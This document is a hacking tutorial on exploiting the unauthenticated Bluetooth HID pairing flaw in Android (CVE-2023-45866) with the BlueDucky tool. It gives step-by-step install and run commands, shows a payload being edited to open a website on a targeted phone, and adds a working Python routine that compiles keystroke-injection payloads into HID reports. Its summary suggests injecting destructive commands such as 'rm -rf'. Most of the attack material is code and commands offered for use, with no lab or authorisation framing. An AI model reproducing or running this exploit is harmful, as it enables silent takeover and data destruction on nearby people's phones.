Bluetooth is a nearly ubiquitous protocol used for short-range communication between devices in a piconet, such as speakers, headphones, and cellphones. If an attacker can exploit Bluetooth, they may be able to take control of or eavesdrop on any of these devices.
There are numerous classes of Bluetooth devices. A device advertises its class (the Class of Device field) to the other side during discovery, before any pairing takes place. In previous Bluetooth tutorials here, we have discussed probably the most important class for exploiting Bluetooth devices, the HID class. HID stands for Human Interface Device and includes such things as Bluetooth mice and keyboards. These are the devices that are allowed to send input to the Bluetooth-enabled host, which is necessary for keyboards and mice to function properly.
In December 2023, a new vulnerability (CVE-2023-45866) was disclosed in the way Bluetooth hosts handle HID devices: an unauthenticated HID device in the peripheral role may be allowed to initiate and establish an encrypted connection without any confirmation from the user. Once connected, the attacker's fake keyboard can inject keystrokes, and therefore commands, into the host. This works against unpatched Android 11 and later devices and against every Android 10 and earlier device, as no patch is available for those versions. The target only needs to have Bluetooth enabled and be within radio range, and the attacker needs its Bluetooth MAC address. A Proof of Concept (PoC) was released in January 2024 and was recently integrated into a new tool known as BlueDucky.
Let’s take a look at this tool and see what it can do.
Step # 1 Download and Install BlueDucky
To install BlueDucky, we need to do a few things to get our system ready.
First, update your apt cache.
kali > sudo apt update
Next, install the necessary dependencies from the Kali repository.
kali > sudo apt install -y bluez-tools bluez-hcidump libbluetooth-dev git gcc python3-pip python3-setuptools python3-pydbus
We now need to get PyBluez, the Python bindings for BlueZ, from github.com. If you have done my previous tutorials on Bluetooth, you likely already have this.
kali > git clone https://github.com/pybluez/pybluez.git
Now, move into the new directory, pybluez.
kali > cd pybluez
We now need to run the PyBluez setup script. It installs into the system Python, so run it as root.
kali > sudo python3 setup.py install
Next, we need to build bdaddr from source. bdaddr lets us query or set the local Bluetooth device address, which is what allows the adapter's address to be spoofed.
kali > cd ~
kali > git clone --depth=1 https://github.com/bluez/bluez.git
kali > gcc -o bdaddr ~/bluez/tools/bdaddr.c ~/bluez/src/oui.c -I ~/bluez -lbluetooth
Now, let's copy bdaddr to our local binary directory (/usr/local/bin) so that the script can call it from anywhere (/usr/local/bin is in the Linux $PATH variable).
kali > sudo cp bdaddr /usr/local/bin
Finally, we should download BlueDucky from github.
kali > git clone https://github.com/pentestfunctions/BlueDucky.git
kali > cd BlueDucky
Finally, bring the Bluetooth adapter up (changing adapter state requires root).
kali > sudo hciconfig hci0 up
Step # 2 Run BlueDucky
Now that we have all of the elements necessary to run BlueDucky installed, let's try running it. If you are running it from a system with an external plug-in Bluetooth adapter, as I am, you will likely need to make a small change to the Python script. BlueDucky, by default, uses hci0 to scan for Bluetooth devices. If you added an external Bluetooth adapter, it will likely be recognized as hci1 (run hciconfig with no arguments to list every adapter and its interface name). We can remedy this by simply opening the script in your favorite text editor and changing the default value to hci1. Here I have used the default GUI text editor in Kali, mousepad.
kali > sudo mousepad BlueDucky.py
Now, go ahead and save this file. Make certain to give yourself execute permissions.
kali > sudo chmod 755 BlueDucky.py
It's a good idea now to check that your Bluetooth adapter is up and activated. As before, this needs root.
kali > sudo hciconfig hci1 up
If your adapter is up and running, it’s time to start BlueDucky!
kali > sudo python3 BlueDucky.py
If you know the MAC address of the target, you can enter it here. If not, simply hit ENTER and BlueDucky will scan for discoverable devices and list their MAC addresses.
At this point, you can enter "yes" and then the number of the device. I selected "4", the Samsung Galaxy Note10+.
You will then be asked which payload you would like to use. There are two payloads available by default (you can build your own and place it in the payloads directory).
I’ve opened payload_example_1.txt in my text editor and edited line 13 to open the dadynews.com website on the target phone.
When I hit ENTER, BlueDucky connects to the target Android phone and opens the website as seen below!
Of course, you can send any keystroke sequence, and so open any website or run any command the target's interface accepts, simply by editing the payload files.
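To see what a payload actually turns into on the wire, here is an added example that is not part of the original tutorial or of BlueDucky's own code. It compiles a Ducky-Script-style payload into the 8-byte HID boot-keyboard reports a fake keyboard sends to the host. The keyword subset it understands, the sample payload, and the names compile_payload, parse_line and char_to_key are assumptions made for this example; the usage IDs are the standard HID Keyboard/Keypad page values for a US layout.

```python
"""Translate a Ducky-Script-style payload into Bluetooth HID keyboard reports.

Added example, not BlueDucky's code. BlueDucky payload files use a
Ducky-Script-like syntax (REM, DELAY, STRING, ENTER, GUI ...). What reaches
the phone over the HID profile is a stream of 8-byte boot-protocol keyboard
input reports: [modifier bits, reserved, key1 .. key6]. After the
unauthenticated pairing the host treats the attacker's radio as a trusted
keyboard and types whatever these reports say. The keyword subset and the
sample payload below are constructed for this example.
"""

from typing import List, Tuple

# Modifier bits in byte 0 of a boot keyboard report.
MODIFIERS = {"CTRL": 0x01, "CONTROL": 0x01, "SHIFT": 0x02, "ALT": 0x04,
             "GUI": 0x08, "WINDOWS": 0x08, "COMMAND": 0x08}
MOD_SHIFT = MODIFIERS["SHIFT"]

# Usage IDs for keys Ducky Script names directly.
NAMED_KEYS = {"ENTER": 0x28, "ESCAPE": 0x29, "ESC": 0x29, "BACKSPACE": 0x2A,
              "TAB": 0x2B, "SPACE": 0x2C, "DELETE": 0x4C, "HOME": 0x4A,
              "END": 0x4D, "RIGHT": 0x4F, "LEFT": 0x50, "DOWN": 0x51, "UP": 0x52}

# Unshifted printable characters on a US keyboard (a..z = 0x04.., 1..9 = 0x1E.., 0 = 0x27).
_PLAIN = {chr(ord("a") + i): 0x04 + i for i in range(26)}
_PLAIN.update({str(d): 0x1E + d - 1 for d in range(1, 10)})
_PLAIN.update({"0": 0x27, " ": 0x2C, "-": 0x2D, "=": 0x2E, "[": 0x2F, "]": 0x30,
               "\\": 0x31, ";": 0x33, "'": 0x34, "`": 0x35, ",": 0x36, ".": 0x37, "/": 0x38})
# Shifted characters, mapped to the unshifted key that produces them.
_SHIFTED = dict(zip("!@#$%^&*()", "1234567890"))
_SHIFTED.update({"_": "-", "+": "=", "{": "[", "}": "]", "|": "\\", ":": ";",
                 '"': "'", "~": "`", "<": ",", ">": ".", "?": "/"})

Action = Tuple  # ("report", bytes) or ("delay", milliseconds)


def char_to_key(ch: str) -> Tuple[int, int]:
    """Return (modifier bits, usage ID) for one printable ASCII character."""
    if ch in _PLAIN:
        return 0, _PLAIN[ch]
    if ch.isupper() and ch.lower() in _PLAIN:
        return MOD_SHIFT, _PLAIN[ch.lower()]
    if ch in _SHIFTED:
        return MOD_SHIFT, _PLAIN[_SHIFTED[ch]]
    raise ValueError(f"no US-layout key for {ch!r}")


def key_report(modifiers: int = 0, usage: int = 0) -> bytes:
    """Build one 8-byte boot keyboard report; all zeros means 'all keys released'."""
    return bytes([modifiers & 0xFF, 0x00, usage & 0xFF, 0, 0, 0, 0, 0])


RELEASE = key_report()


def parse_line(line: str) -> List[Tuple]:
    """Parse one payload line into ('press', mods, usage) / ('delay', ms) tuples."""
    line = line.strip()
    if not line or line.startswith("REM"):
        return []
    cmd, _, arg = line.partition(" ")
    if cmd == "STRING":
        return [("press", *char_to_key(c)) for c in arg]
    if cmd == "DELAY":
        return [("delay", int(arg))]
    # Anything else is a key combination such as "GUI", "ENTER" or "CTRL ALT DELETE".
    mods, usage = 0, 0
    for tok in line.split():
        if tok in MODIFIERS:
            mods |= MODIFIERS[tok]
        elif tok in NAMED_KEYS:
            usage = NAMED_KEYS[tok]
        elif len(tok) == 1:          # e.g. the "r" in "GUI r"
            m, usage = char_to_key(tok)
            mods |= m
        else:
            raise ValueError(f"unknown token {tok!r} in line {line!r}")
    return [("press", mods, usage)]


def compile_payload(text: str) -> List[Action]:
    """Compile a whole payload into the report/delay sequence a fake keyboard sends.

    Every key press is followed by a release report: a real HID host needs
    the release to register a repeated character such as the two l's in "hello".
    """
    actions: List[Action] = []
    for line in text.splitlines():
        for item in parse_line(line):
            if item[0] == "delay":
                actions.append(("delay", item[1]))
            else:
                _, mods, usage = item
                actions.append(("report", key_report(mods, usage)))
                actions.append(("report", RELEASE))
    return actions


# Constructed sample payload in the Ducky-Script-like syntax BlueDucky's payload files use.
SAMPLE_PAYLOAD = """REM constructed example: press the GUI key, type Hi!, press ENTER
DELAY 500
GUI
STRING Hi!
ENTER
"""

if __name__ == "__main__":
    for kind, value in compile_payload(SAMPLE_PAYLOAD):
        print(kind, value.hex() if kind == "report" else f"{value} ms")
```

Nothing in these reports identifies or authenticates the sender: the host's input stack trusts whatever arrives on the HID channel once pairing has succeeded, which is why the unauthenticated pairing is the whole vulnerability and why a payload file is all an attacker has to change.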
Summary
Bluetooth-enabled devices are all around us in our everyday life. These include phones, tablets, speakers, headsets, keyboards and many other devices. Bluetooth devices declare what type of device they are before pairing with another device. This is the class of the device. An attacker can present their adapter as a keyboard (HID class) and, because of the unauthenticated pairing flaw, be accepted as one without the user confirming anything, after which they can inject keystrokes into the device.
BlueDucky is an automated tool for exploiting this vulnerability. Although the tool by default only sends an innocuous payload to the target, it can easily be altered to type any keystroke sequence the target accepts, from opening a malicious website or changing settings to, on a host with a shell open, commands such as "shutdown" or "rm -rf".